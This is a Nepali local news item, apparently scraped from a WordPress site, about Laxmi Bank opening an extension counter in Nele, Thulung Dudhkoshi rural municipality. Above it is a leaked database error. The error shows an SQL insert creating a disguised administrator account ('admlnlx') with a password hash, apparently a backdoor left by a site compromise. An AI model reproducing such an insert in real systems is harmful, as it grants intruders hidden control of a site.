WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BfN2fJVEC7AbHPAd/6SbxEkD.Zvdw0.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 06:52:01', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, २९ साउन, सोलुल्हुम्बु । थुलुङदुधकोशी गाउँपालिका १ नेलेमा लक्ष्मी बैंकको एक्सटेन्सन काउण्टर स्थापना हुने भएको छ ।
सोमबार स्वीकृति पत्र पाएको थुलुङ दुधकोशी गाउँपालिका अध्यक्ष असिम राईले आफ्नो फेसबुकमार्फत जानकारी गराएको छ । एक्सटेन्सन काउण्टर भएपनि शाखाले गर्ने नयाँ खाता खोल्न, रकम जम्मा गर्न, झिक्न र कर्जा सम्बन्धि लगाएत सबै काम समेत नेलेबाट गर्न सकिने लक्ष्मी बैंकले जनाएको छ ।
नेपाल राष्ट्र बैंकको निति अनुसार गाउँपालिका केन्द्र मुक्लि र सल्लेरीमा लक्ष्मी बैंकको शाखा स्थापना भइ सञ्चालमा रहेको छ । नेलेबजार बासीको माग र आवश्यकतालाई ध्यान दिदै काउण्टर स्थापना गराउन सफल भएको गाउँपालिका अध्यक्ष राईले बताए । बैंकको शाखा सो सरह सुविधा उपलब्ध हुने गरि काउण्टर स्थापनाको लागि गरिएको पहल सफल भएको अध्यक्ष राईको बताए ।
थुलुङ दुधकोशी गाउँपालिका अध्यक्षको फेसबुक स्टाटस